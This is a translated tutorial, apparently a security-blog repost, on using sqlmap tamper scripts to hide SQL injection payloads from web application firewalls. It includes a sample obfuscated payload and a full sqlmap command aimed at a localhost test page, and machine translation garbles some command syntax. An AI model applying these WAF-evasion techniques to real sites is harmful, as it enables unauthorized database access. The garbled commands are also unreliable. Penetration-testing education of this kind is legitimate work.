How to Use sqlmap to bypass WAF

Abstract: Author: bugcx or anonymous WAF (Web application firewall) has gradually become one of the standard security solutions. With it, many companies do not even care about Web application vulnerabilities. Unfortunately, not all WAF services cannot be bypassed! This article will show you how to use the sqlmap injection tool to bypass WAFS/IDSS. SVN download the latest version...

Author: bugcx or anonymous

WAF (Web application firewall) has gradually become one of the standard security solutions. With it, many companies do not even care about Web application vulnerabilities. Unfortunately, not all WAF services cannot be bypassed! This article will show you how to use the sqlmap injection tool to bypass WAFS/IDSS.

Download the latest version of sqlmap from SVN
SVN checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-Dev

Our focus is to use the tamper script to modify requests to avoid WAF rule detection. In many cases, you need to use multiple tamper scripts together.
See https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ for all tamper scripts

Here, we take space2hash. py and space2morehash. py for MySQL as examples. The two scripts will automatically convert all spaces into random comments, and the extended version of the script (space2morehash. PY) will also help you to "Disrupt" method functions to bypass WAF detection.

Example: * input: 1 and 9227 = 9227
* Output: 1% 23 pttmjopxdwj % 0 aand % 23 cwfcvrpv % 0a9227 = 9227

Now let's focus on it.

You can use the command-tamper to call the script, as shown below:

./Sqlmap. py-u http: // 127.0.0.1/test. php? Id = 1-V 3-DBMS "MySQL"-technique u-p ID-batch-tamper "space2morehash. py"

We can see that the space in the request is replaced with % 23 randomtext % 0a after URL encoding.
The Char (), user (), Concat () function is replaced with function % 23 randomtext % 0a ()

There are two other space replacement scripts: space2mssqlblank. py and space2mysqlblank. py, as shown in figure

Charencode. py andchardoubleencode. py is two tamper scripts used to disrupt the encoding. They play a role in bypassing different keyword filtering.

If the web application is developed using ASP/Asp.net, charunicodeencode. py and percentage. py can help you escape WAF detection.

Interestingly, ASP allows multiple % numbers to be separated between characters. For example, and 1 = % 1 is valid!

Summary:

Some representative tamper scripts are listed above to help us bypass waf. Each script has its own use scenario and needs to be used flexibly.
Text/Robert Salgado/[freebuf] Thanks